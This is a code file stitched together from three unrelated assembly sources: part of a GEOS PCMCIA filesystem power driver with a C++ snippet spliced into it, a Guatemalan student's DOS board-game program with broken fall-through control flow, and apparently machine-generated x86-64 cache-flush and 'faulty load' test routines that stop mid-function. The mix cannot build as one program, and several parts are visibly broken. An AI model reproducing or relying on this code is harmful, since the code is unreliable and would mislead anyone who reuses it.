%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSUnmapLastOffset proc far
if ERROR_CHECK
uses ds, ax
.enter
pushf
call LoadVarSegDS
clr ax
xchg ax, ds:[fsMapped]
tst ax
ERROR_Z NOTHING_MAPPED
popf
.leave
endif
ret
PGFSUnmapLastOffset endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSDiskID
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Return an error if the card is removed
CALLED BY: GFSDiskID
PASS: es:si - DriveStatusEntry
RETURN: cx:dx - disk ID
al
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSDiskID proc near
uses ds, bx
.enter
call LoadVarSegDS
mov bx, es:[si].DSE_private
mov bx, es:[bx].PGFSPD_socketPtr
test ds:[bx].PGFSSI_conflict, mask PGFSCI_REMOVED
jnz error
movdw cxdx, ds:[bx].PGFSSI_checksum
mov ax, MEDIA_FIXED_DISK shl 8
done:
.leave
ret
error:
stc
jmp done
PGFSDiskID endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOn
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Turn on the power to the socket
CALLED BY: GFSDiskLock
PASS: es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
Stolen from CIDFSStrategy
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOn proc near
uses cx, ds
.enter
push ax, bx
call LoadVarSegDS
mov bx, es:[bx].DSE_private
mov bx, es:[bx].PGFSPD_socketPtr
;
; The synchronization here is ugly. Because the conflict resolution
; stuff may need to wake up a bunch of people, it does a VAllSem
; followed by setting the Sem_value to 0 (both are done within a
; single critical section). Because we could context-switch between
; checking the _conflict variable and performing a PSem, ending up
; with us blocked on the semaphore with _conflict set FALSE (i.e.
; blocking until the next time the card is removed), we enter our
; own critical section before checking the _conflict flag, leaving it
; only after we've decremented Sem_value. We don't even check the result
; of the decrement as we know that if _conflict is TRUE, we should
; always block.
;
; Now, when ObjectionResolved performs its VAllSem, if there aren't
; -Sem_value threads on the queue, Sem_value will end up a positive
; number that will keep us from blocking at all. If the conflict isn't
; resolved before we block, it's just as if we'd done a normal PSem.
; If the conflict is resolved before we block, we won't actually
; block.
;
; While it's true that another conflict could arise after
; the VAllSem is complete and before we block, which means that we
; (or some other thread) won't actually block when we're supposed to,
; and the counter will be off forever, I don't think I care enough
; to worry about it.
;
call SysEnterCritical
test ds:[bx].PGFSSI_conflict, mask PGFSCI_REMOVED
jz continuePowerOn
;
; check to see if the thread is the pcmcia
; thread, if it is do not dec the semaphore. this is done to
; prevent the pcmcia thread from blocking on the conflict and
; then not being able to clear the conflict.
;
cmp ss:[TPD_processHandle], handle pcmcia
je continuePowerOn
dec ds:[bx].PGFSSI_conflictSem.Sem_value
call SysExitCritical
mov ax, ds ; ax:bx <- queue on which to block
add bx, offset PGFSSI_conflictSem.Sem_queue
call ThreadBlockOnQueue
jmp continuePowerOn_CriticalExited
continuePowerOn:
call SysExitCritical
continuePowerOn_CriticalExited:
pop ax, bx
mov cx, -1
call PGFSPowerOnOffCommon
.leave
ret
PGFSPowerOn endp
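;
; The strategy in the comment above, sketched with C++ primitives (purely
; illustrative: the global critical section becomes a mutex, and the
; Sem_value / Sem_queue pair becomes a counter plus condition variable):
#include <mutex>
#include <condition_variable>
static std::mutex gCrit;                   // SysEnterCritical/SysExitCritical
static std::condition_variable gQueue;     // Sem_queue
static int gSemValue = 0;                  // Sem_value
static bool gConflictRemoved = false;      // PGFSCI_REMOVED flag
void waitForConflictResolution() {
    std::unique_lock<std::mutex> lock(gCrit);  // enter critical section
    if (gConflictRemoved) {
        --gSemValue;               // commit to blocking before leaving the
        gQueue.wait(lock);         // critical section (wait releases the lock)
    }
}
void conflictResolved() {          // the "VAllSem" side
    std::lock_guard<std::mutex> lock(gCrit);
    gQueue.notify_all();           // wake everyone queued
    gSemValue = 0;                 // reset within the same critical section
}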
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOff
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Turn off the power
CALLED BY: GFSDiskUnlock
PASS: es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOff proc near
uses ds, cx
.enter
call LoadVarSegDS
clr cx
call PGFSPowerOnOffCommon
.leave
ret
PGFSPowerOff endp
COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
PGFSPowerOnOffCommon
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SYNOPSIS: Call the power driver
CALLED BY: PGFSPowerOn, PGFSPowerOff
PASS: cx - nonzero to turn power on, zero to power off
ds - dgroup
es:bx - DriveStatusEntry
RETURN: carry clear
DESTROYED: nothing
PSEUDO CODE/STRATEGY:
KNOWN BUGS/SIDE EFFECTS/IDEAS:
REVISION HISTORY:
Name Date Description
---- ---- -----------
chrisb 5/ 5/94 Initial version.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@
PGFSPowerOnOffCommon proc near
tst ds:[powerStrat].segment
jz done
push ax, bx, dx, di
mov ax, PDT_PCMCIA_SOCKET
mov bx, es:[bx].DSE_private
mov bx, es:[bx].PGFSPD_common.PCMDPD_socket
mov dx, mask PCMCIAPI_NO_POWER_OFF
mov di, DR_POWER_DEVICE_ON_OFF
call ds:[powerStrat]
pop ax, bx, dx, di
done:
clc
ret
PGFSPowerOnOffCommon endp
Resident ends
|
; Board layout: COLUMN index (0-7) across the top, ROW index (0-7) down
; the side, square numbers 01-64 in the body
;      0  1  2  3  4  5  6  7
; 0   01 02 03 04 05 06 07 08
; 1   09 10 11 12 13 14 15 16
; 2   17 18 19 20 21 22 23 24
; 3   25 26 27 28 29 30 31 32
; 4   33 34 35 36 37 38 39 40
; 5   41 42 43 44 45 46 47 48
; 6   49 50 51 52 53 54 55 56
; 7   57 58 59 60 61 62 63 64
.model small
.stack 200h
VAL_LF EQU 10 ; line feed constant
VAL_RET EQU 13 ; carriage return constant
CHR_FIN EQU '$'
MAX_COL EQU 8 ; 8 board columns per row (plain print)
MAX_COL2 EQU 10 ; row stride when printed as a matrix: 8 columns plus LF and CR
;====================================================================================
;====================================================================================
;====================================================================================
;====================================================================================
.data
; Define the board as an 8 x 8 array of cells; each row also carries a
; trailing VAL_LF and VAL_RET so the whole matrix can be printed directly.
; Layout of each row block (shown here for a 5-column example):
; 0 1 2 3 4 VAL_LF VAL_RET
; 0 01 02 03 04 05 - -
; 1 06 07 08 09 10 - -
; 2 11 12 13 14 15 - -
; 3 16 17 18 19 20 - -
; 4 21 22 23 24 25 - -
matIntEdades2 DB 8 DUP (8 DUP ("x"),VAL_LF,VAL_RET)
strFin2 DB VAL_LF,VAL_RET,CHR_FIN
;TITLE SCREEN MESSAGES
titulo db 13,10,'Universidad de Sancarlos de Guatemala',13,10,'$'
titulo2 db 13,10,'Facultad de Ingenieria',13,10,'$'
titulo3 db 13,10,'Ciencias y Sistemas',13,10,'$'
titulo4 db 13,10,'Arquitectura de Computadores y Ensambladores 1',13,10,'$'
titulo5 db 13,10,'Nombre: Cesar Alejandro Sazo Quisquinay',13,10,'$'
titulo6 db 13,10,'Carnet: 201513858',13,10,'$'
titulo7 db 13,10,'Seccion: A',13,10,'$'
mensaje db '-1 Iniciar Juego',13,10,'-2 Cargar Juego',13,10,'-3 Salir',13,10,'$'
mensaje1 db 'Pantalla en color azul',13,10,'$'
mensaje2 db 'Pantalla en color morado',13,10,'$'
mensaje3 db 'Pantalla en color gris con letras negras',13,10,'$'
;GAME MESSAGES
mensajejuego db 13,10,'Turno Blancas: ','$'
mensajejuego2 db 13,10,'Turno Negras: ','$'
mensajejuego3 db 13,10,'Casilla Actual x-y: ','$'
mensajejuego4 db 13,10,'Casilla Destino x-y: ','$'
mensajejuego5 db 13,10,'Casilla Actual y-x: ','$'
mensajejuego6 db 13,10,'Casilla Destino y-x: ','$'
mensajejuego7 db 13,10,'Casilla Actual/Destino: ','$'
;variables for the position of the piece to move
n_xActual db ?
n_yActual db ?
n_xDestino db ?
n_yDestino db ?
;====================================================================================
;====================================================================================
;====================================================================================
;====================================================================================
cadena db 100 dup(' '),'$'
cadenaTurnos db 100 dup(' '),'$'
.code
codigo segment
assume ds:@data, cs:codigo
inicio:
mov ax,@data ;load the .data segment
mov ds,ax ;store it in ds
mov ah,0 ;clear the register
;================TITLE SCREEN===========================
;========================================================
lea dx,titulo ;print the message
mov ah,9h
int 21h
lea dx,titulo2 ;print the message
mov ah,9h
int 21h
lea dx,titulo3 ;print the message
mov ah,9h
int 21h
lea dx,titulo4 ;print the message
mov ah,9h
int 21h
lea dx,titulo5 ;print the message
mov ah,9h
int 21h
lea dx,titulo6 ;print the message
mov ah,9h
int 21h
lea dx,titulo7 ;print the message
mov ah,9h
int 21h
;=====================================================================
lea dx,mensaje ;print the menu
mov ah,9h
int 21h
;read and echo the user's command
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;for the other commands
cmp cadena[0],'e'; for exit
jz CarharJuegoMetodo
cmp cadena[0],'s'; for exit
jz CarharJuegoMetodo
cmp cadena[1],'h'; for show
jz CarharJuegoMetodo
;for the menu commands
cmp cadena[0],'1'
jz IniciarJuegoMetodo ; start game
cmp cadena[0],'2'
jz CarharJuegoMetodo ; load game
cmp cadena[0],'3'
jz FinalizarJuego
;end of command comparison
FinalizarJuego:
mov ax,4c00h ;DOS function that ends the program
int 21h
IniciarJuegoMetodo:
;call the procedure
CALL CargarTablero
CarharJuegoMetodo:
CALL MORADOPROC ;call the procedure
CargarTableroMetodo:
CALL CargarTablero
CargarTablero PROC NEAR
; load the data segment into ax
mov ax, @data
; move ax into ds
mov ds,ax
;MATRIX MODIFICATION SECTION: we change values in the plain matrix
;FORMULA = ROW * MAX_COL2 + COL
; point dx at the board so we can print it
mov dx,offset matIntEdades2
mov ah,09
int 21h
;FORMULA = ROW * MAX_COL2 + COL
;BLACK PIECES
mov matIntEdades2 + 0 * MAX_COL2 + 1,78 ; place 'N' (78) at ROW 0 COL 1
mov matIntEdades2 + 0 * MAX_COL2 + 3,78
mov matIntEdades2 + 0 * MAX_COL2 + 5,78
mov matIntEdades2 + 0 * MAX_COL2 + 7,78
mov matIntEdades2 + 1 * MAX_COL2 + 0,78
mov matIntEdades2 + 1 * MAX_COL2 + 2,78
mov matIntEdades2 + 1 * MAX_COL2 + 4,78
mov matIntEdades2 + 2 * MAX_COL2 + 1,78
mov matIntEdades2 + 2 * MAX_COL2 + 3,78
mov matIntEdades2 + 2 * MAX_COL2 + 5,78
mov matIntEdades2 + 2 * MAX_COL2 + 7,78
;WHITE PIECES
mov matIntEdades2 + 7 * MAX_COL2 + 0,66 ; place 'B' (66) at ROW 7 COL 0
mov matIntEdades2 + 7 * MAX_COL2 + 2,66
mov matIntEdades2 + 7 * MAX_COL2 + 4,66
mov matIntEdades2 + 7 * MAX_COL2 + 6,66
mov matIntEdades2 + 6 * MAX_COL2 + 1,66
mov matIntEdades2 + 6 * MAX_COL2 + 3,66
mov matIntEdades2 + 6 * MAX_COL2 + 5,66
mov matIntEdades2 + 6 * MAX_COL2 + 7,66
mov matIntEdades2 + 5 * MAX_COL2 + 0,66
mov matIntEdades2 + 5 * MAX_COL2 + 2,66
mov matIntEdades2 + 5 * MAX_COL2 + 4,66
mov matIntEdades2 + 5 * MAX_COL2 + 6,66
int 21h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
CALL PROBLANCASACTUAL
RET
CargarTablero ENDP
;WHITE'S PROCESS=========================================================================================================
;TEMPORARY PROCESSES: reads white's CURRENT square
PROBLANCASACTUAL PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
;print
lea dx,mensajejuego; = white's turn
mov ah,9h
int 21h
;print
lea dx,mensajejuego3; current position x-y
mov ah,9h
int 21h
;===
;read and echo the user's input
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;for the other commands
cmp cadena[0],'E'; for exit
jz LLAMARAINICIO
;column letters a-h select the X coordinate
cmp cadena[0],'a'
jz VariableXactualM
cmp cadena[0],'b'
jz VariableXactualM
cmp cadena[0],'c'
jz VariableXactualM
cmp cadena[0],'d'
jz VariableXactualM
cmp cadena[0],'e'
jz VariableXactualM
cmp cadena[0],'f'
jz VariableXactualM
cmp cadena[0],'g'
jz VariableXactualM
cmp cadena[0],'h'
jz VariableXactualM
cmp cadena[0],'1'
jz VariableYactualM
cmp cadena[0],'2'
jz VariableYactualM
cmp cadena[0],'3'
jz VariableYactualM
cmp cadena[0],'4'
jz VariableYactualM
cmp cadena[0],'5'
jz VariableYactualM
cmp cadena[0],'6'
jz VariableYactualM
cmp cadena[0],'7'
jz VariableYactualM
cmp cadena[0],'8'
jz VariableYactualM
CALL PROBLANCASACTUAL
RET
PROBLANCASACTUAL ENDP
;END OF TEMPORARY PROCESSES====
VariableXactualM:
CALL GuardarVariablexActual
VariableYactualM:
CALL GuardarVariableyActual
LLAMARAINICIO:
CALL prollamarinicio
;TEMPORARY PROCESSES: reads white's DESTINATION square
PROBLANCASDESTINO PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
;print
lea dx,mensajejuego; = white's turn
mov ah,9h
int 21h
;print
lea dx,mensajejuego4; destination position x-y
mov ah,9h
int 21h
;===
;read and echo the user's input
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;for the other commands
cmp cadena[0],'E'; for exit
jz LLAMARAINICIODestino
;column letters a-h select the X coordinate
cmp cadena[0],'a'
jz VariableXMDestino
cmp cadena[0],'b'
jz VariableXMDestino
cmp cadena[0],'c'
jz VariableXMDestino
cmp cadena[0],'d'
jz VariableXMDestino
cmp cadena[0],'e'
jz VariableXMDestino
cmp cadena[0],'f'
jz VariableXMDestino
cmp cadena[0],'g'
jz VariableXMDestino
cmp cadena[0],'h'
jz VariableXMDestino
cmp cadena[0],'1'
jz VariableYMDestino
cmp cadena[0],'2'
jz VariableYMDestino
cmp cadena[0],'3'
jz VariableYMDestino
cmp cadena[0],'4'
jz VariableYMDestino
cmp cadena[0],'5'
jz VariableYMDestino
cmp cadena[0],'6'
jz VariableYMDestino
cmp cadena[0],'7'
jz VariableYMDestino
cmp cadena[0],'8'
jz VariableYMDestino
;end of input comparison
;===
mov ah,08 ;pause and wait for the user to press a key
int 21h
CALL PROBLANCASDESTINO
RET
PROBLANCASDESTINO ENDP
;END OF TEMPORARY PROCESSES====
VariableXMDestino:
CALL GuaradarVariablexDestino
VariableYMDestino:
CALL GuardarVariableyDestino
LLAMARAINICIODestino:
CALL prollamarinicio
prollamarinicio PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
CALL inicio
RET
prollamarinicio ENDP
GuaradarVariablexDestino PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
; read one character
mov ah, 01h
int 21h
sub al,30h
mov n_xDestino,al
CALL PROBLANCASDESTINO
RET
GuaradarVariablexDestino ENDP
GuardarVariableyDestino PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
; read one character
mov ah, 01h
int 21h
sub al,30h
mov n_yDestino,al
;PRINT ALL THE DATA
lea dx,mensajejuego7; current/destination squares
mov ah,9h
int 21h
mov ah,02h
mov dl,n_xActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_yActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_xDestino
add dl,30h
int 21h
mov ah,02h
mov dl,n_yDestino
add dl,30h
int 21h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
CALL PRONEGRASACTUAL
RET
GuardarVariableyDestino ENDP
GuardarVariablexActual PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah, 01h
int 21h
sub al,30h
mov n_xActual,al
CALL PROBLANCASACTUAL
RET
GuardarVariablexActual ENDP
GuardarVariableyActual PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
;read
mov ah, 01h
int 21h
sub al,30h
mov n_yActual,al
mov ah,08 ;pause and wait for the user to press a key
int 21h
CALL PROBLANCASDESTINO
RET
GuardarVariableyActual ENDP
;END OF WHITE'S PROCESS=========================================================================================================
;BLACK'S PROCESS=========================================================================================================
;CURRENT move of the black pieces
PRONEGRASACTUAL PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
;print
lea dx,mensajejuego2; = black's turn
mov ah,9h
int 21h
;print
lea dx,mensajejuego3; current position x-y
mov ah,9h
int 21h
;===
;read and echo the user's input
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;for the other commands
cmp cadena[0],'E'; for exit
jz LLAMARAINICION
;column letters a-h select the X coordinate
cmp cadena[0],'a'
jz VariableXactualMN
cmp cadena[0],'b'
jz VariableXactualMN
cmp cadena[0],'c'
jz VariableXactualMN
cmp cadena[0],'d'
jz VariableXactualMN
cmp cadena[0],'e'
jz VariableXactualMN
cmp cadena[0],'f'
jz VariableXactualMN
cmp cadena[0],'g'
jz VariableXactualMN
cmp cadena[0],'h'
jz VariableXactualMN
cmp cadena[0],'1'
jz VariableYactualMN
cmp cadena[0],'2'
jz VariableYactualMN
cmp cadena[0],'3'
jz VariableYactualMN
cmp cadena[0],'4'
jz VariableYactualMN
cmp cadena[0],'5'
jz VariableYactualMN
cmp cadena[0],'6'
jz VariableYactualMN
cmp cadena[0],'7'
jz VariableYactualMN
cmp cadena[0],'8'
jz VariableYactualMN
CALL PRONEGRASACTUAL
RET
PRONEGRASACTUAL ENDP
;END OF TEMPORARY PROCESSES====
VariableXactualMN:
CALL GuardarVariablexActualN
VariableYactualMN:
CALL GuardarVariableyActualN
LLAMARAINICION:
CALL prollamarinicioN
prollamarinicioN PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
CALL inicio
RET
prollamarinicioN ENDP
;TEMPORARY PROCESSES: reads black's DESTINATION square
PRONEGRASDESTINO PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
;print
lea dx,mensajejuego2; = black's turn
mov ah,9h
int 21h
;print
lea dx,mensajejuego4; destination position x-y
mov ah,9h
int 21h
;===
;read and echo the user's input
mov ah, 3fh
mov bx,00
mov cx,100
mov dx, offset[cadena]
int 21h
mov ah, 09h
mov dx, offset[cadena]
int 21h
;for the other commands
cmp cadena[0],'E'; for exit
jz LLAMARAINICIODestinoN
;column letters a-h select the X coordinate
cmp cadena[0],'a'
jz VariableXMDestinoN
cmp cadena[0],'b'
jz VariableXMDestinoN
cmp cadena[0],'c'
jz VariableXMDestinoN
cmp cadena[0],'d'
jz VariableXMDestinoN
cmp cadena[0],'e'
jz VariableXMDestinoN
cmp cadena[0],'f'
jz VariableXMDestinoN
cmp cadena[0],'g'
jz VariableXMDestinoN
cmp cadena[0],'h'
jz VariableXMDestinoN
cmp cadena[0],'1'
jz VariableYMDestinoN
cmp cadena[0],'2'
jz VariableYMDestinoN
cmp cadena[0],'3'
jz VariableYMDestinoN
cmp cadena[0],'4'
jz VariableYMDestinoN
cmp cadena[0],'5'
jz VariableYMDestinoN
cmp cadena[0],'6'
jz VariableYMDestinoN
cmp cadena[0],'7'
jz VariableYMDestinoN
cmp cadena[0],'8'
jz VariableYMDestinoN
;end of input comparison
;===
mov ah,08 ;pause and wait for the user to press a key
int 21h
CALL PRONEGRASDESTINO
RET
PRONEGRASDESTINO ENDP
;END OF TEMPORARY PROCESSES====
VariableXMDestinoN:
CALL GuaradarVariablexDestinoN
VariableYMDestinoN:
CALL GuardarVariableyDestinoN
LLAMARAINICIODestinoN:
CALL prollamarinicioN2
prollamarinicioN2 PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
CALL inicio
RET
prollamarinicioN2 ENDP
GuaradarVariablexDestinoN PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
; read one character
mov ah, 01h
int 21h
sub al,30h
mov n_xDestino,al
CALL PRONEGRASDESTINO
RET
GuaradarVariablexDestinoN ENDP
GuardarVariableyDestinoN PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
; read one character
mov ah, 01h
int 21h
sub al,30h
mov n_yDestino,al
;PRINT ALL THE DATA
lea dx,mensajejuego7; current/destination squares
mov ah,9h
int 21h
mov ah,02h
mov dl,n_xActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_yActual
add dl,30h
int 21h
mov ah,02h
mov dl,n_xDestino
add dl,30h
int 21h
mov ah,02h
mov dl,n_yDestino
add dl,30h
int 21h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
CALL MODIFICARMATRIZ ;hard-wired here; this used to call PROBLANCASACTUAL
RET
GuardarVariableyDestinoN ENDP
GuardarVariablexActualN PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
mov ah, 01h
int 21h
sub al,30h
mov n_xActual,al
CALL PRONEGRASACTUAL
RET
GuardarVariablexActualN ENDP
GuardarVariableyActualN PROC NEAR
mov ah,0 ;clear the register
mov al,3h ;text mode
int 10h
;read
mov ah, 01h
int 21h
sub al,30h
mov n_yActual,al
mov ah,08 ;pause and wait for the user to press a key
int 21h
CALL PRONEGRASDESTINO
RET
GuardarVariableyActualN ENDP
;END OF BLACK'S PROCESS=========================================================================================================
MORADOPROC PROC NEAR
mov ah,0
mov al,3h
int 10h
mov ax,0600h
mov bh,5fh
mov cx,0000h
mov dx,184Fh
int 10h
lea dx,mensaje2
mov ah,9h
int 21h
CALL inicio
RET
MORADOPROC ENDP
COMPARACIONDEFICHASNEGRAS PROC NEAR
mov ah,0
mov al,3h
int 10h
cmp n_xActual,'a'
jz MODIFICARMATRIZ
cmp n_yActual,'1'
jz MODIFICARMATRIZ
CALL MODIFICARMATRIZ
RET
COMPARACIONDEFICHASNEGRAS ENDP
MODIFICARMATRIZ PROC NEAR
mov ah,0
mov al,3h
int 10h
;MATRIX MODIFICATION SECTION: we change a value in the plain matrix
;FORMULA = ROW * MAX_COL2 + COL
; point dx at the board so we can print it
mov dx,offset matIntEdades2
mov ah,09
int 21h
;FORMULA = ROW * MAX_COL2 + COL
cmp n_xActual,'a' ;this is the column
jz x1
cmp n_xActual,'b' ;this is the column
jz x2
cmp n_xActual,'c' ;this is the column
jz x3
cmp n_xActual,'d' ;this is the column
jz x4
cmp n_xActual,'e' ;this is the column
jz x5
cmp n_xActual,'f' ;this is the column
jz x6
cmp n_xActual,'g' ;this is the column
jz x7
cmp n_xActual,'h' ;this is the column
jz x8
; mov matIntEdades2 + n_xActual * MAX_COL2 + n_yActual,87 ; would place 'W' (87) at the selected square
x1:
mov matIntEdades2 + 1 * MAX_COL2 + 0,87 ; place 'W' (87) at ROW 1 COL 0
x2:
mov matIntEdades2 + 1 * MAX_COL2 + 1,87 ; place 'W' (87) at ROW 1 COL 1
x3:
mov matIntEdades2 + 1 * MAX_COL2 + 2,87 ; place 'W' (87) at ROW 1 COL 2
x4:
mov matIntEdades2 + 1 * MAX_COL2 + 3,87 ; place 'W' (87) at ROW 1 COL 3
x5:
mov matIntEdades2 + 1 * MAX_COL2 + 4,87 ; place 'W' (87) at ROW 1 COL 4
x6:
mov matIntEdades2 + 1 * MAX_COL2 + 5,87 ; place 'W' (87) at ROW 1 COL 5
x7:
mov matIntEdades2 + 1 * MAX_COL2 + 6,87 ; place 'W' (87) at ROW 1 COL 6
x8:
mov matIntEdades2 + 1 * MAX_COL2 + 7,87 ; place 'W' (87) at ROW 1 COL 7
;WHITE PIECES
; mov matIntEdades2 + n_xDestino * MAX_COL2 + n_xDestino,87 ; same idea for the destination square
; int 21h
mov dx,offset matIntEdades2
mov ah,09
int 21h
mov ah,08 ;pause and wait for the user to press a key
int 21h ;interrupt to capture the keystroke
CALL inicio
RET
MODIFICARMATRIZ ENDP
codigo ends
end inicio
|
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r14
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0xd797, %rsi
nop
nop
nop
nop
mfence
movl $0x61626364, (%rsi)
nop
nop
nop
nop
inc %r14
lea addresses_normal_ht+0xc52f, %r10
nop
nop
nop
nop
nop
cmp $3911, %rcx
mov (%r10), %r13w
mfence
lea addresses_WC_ht+0x1b597, %r13
add %rcx, %rcx
mov (%r13), %esi
nop
nop
nop
nop
cmp $25870, %r13
lea addresses_UC_ht+0x1de71, %rcx
nop
nop
nop
nop
nop
sub %r10, %r10
mov $0x6162636465666768, %r14
movq %r14, %xmm4
movups %xmm4, (%rcx)
nop
sub %r14, %r14
lea addresses_A_ht+0x19d7b, %r10
clflush (%r10)
sub $15925, %rcx
mov (%r10), %eax
nop
nop
nop
nop
inc %rax
lea addresses_UC_ht+0x175ff, %rcx
clflush (%rcx)
nop
nop
nop
nop
add $25594, %r10
mov (%rcx), %r14w
nop
cmp $8708, %rcx
lea addresses_A_ht+0x45f7, %rsi
nop
nop
nop
nop
nop
cmp %r13, %r13
mov $0x6162636465666768, %rbp
movq %rbp, %xmm1
and $0xffffffffffffffc0, %rsi
movntdq %xmm1, (%rsi)
nop
nop
nop
nop
nop
and %rbp, %rbp
lea addresses_A_ht+0x1d817, %rax
nop
nop
nop
nop
nop
sub $60422, %r13
mov (%rax), %bp
and %rcx, %rcx
lea addresses_UC_ht+0xec97, %rcx
and %r14, %r14
movb (%rcx), %al
nop
nop
nop
nop
sub %r13, %r13
lea addresses_D_ht+0x19fc7, %r10
nop
nop
and %rcx, %rcx
and $0xffffffffffffffc0, %r10
movaps (%r10), %xmm1
vpextrq $0, %xmm1, %rbp
nop
nop
lfence
lea addresses_D_ht+0x8397, %rsi
nop
nop
nop
xor $22265, %rbp
mov (%rsi), %ax
nop
nop
nop
nop
nop
sub %rbp, %rbp
lea addresses_WC_ht+0x43eb, %rbp
nop
nop
nop
and $35275, %r13
movb $0x61, (%rbp)
nop
cmp %rsi, %rsi
lea addresses_normal_ht+0x19647, %rsi
lea addresses_UC_ht+0x17997, %rdi
clflush (%rdi)
nop
nop
nop
nop
cmp $39148, %rbp
mov $20, %rcx
rep movsl
nop
nop
nop
cmp $32165, %rbp
lea addresses_WC_ht+0x8bdd, %rbp
nop
nop
nop
nop
cmp %r13, %r13
mov $0x6162636465666768, %r10
movq %r10, (%rbp)
nop
nop
nop
nop
nop
add %r14, %r14
lea addresses_WT_ht+0x18097, %r13
nop
nop
nop
nop
nop
cmp $14998, %rax
mov (%r13), %edi
add $65353, %rax
pop %rsi
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r14
pop %r13
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r13
push %r14
push %r9
push %rcx
push %rdi
push %rdx
// Load
lea addresses_US+0x19197, %rcx
nop
dec %r12
vmovaps (%rcx), %ymm4
vextracti128 $0, %ymm4, %xmm4
vpextrq $0, %xmm4, %r13
sub %r12, %r12
// Store
lea addresses_PSE+0x17597, %rcx
nop
nop
nop
dec %r9
mov $0x5152535455565758, %r13
movq %r13, %xmm4
movups %xmm4, (%rcx)
xor %rdx, %rdx
// Store
lea addresses_PSE+0x8657, %rdx
nop
and %rdi, %rdi
mov $0x5152535455565758, %rcx
movq %rcx, (%rdx)
nop
nop
nop
nop
nop
sub $5371, %rdi
// Store
lea addresses_WC+0x16e5f, %rdx
nop
nop
nop
nop
nop
dec %rcx
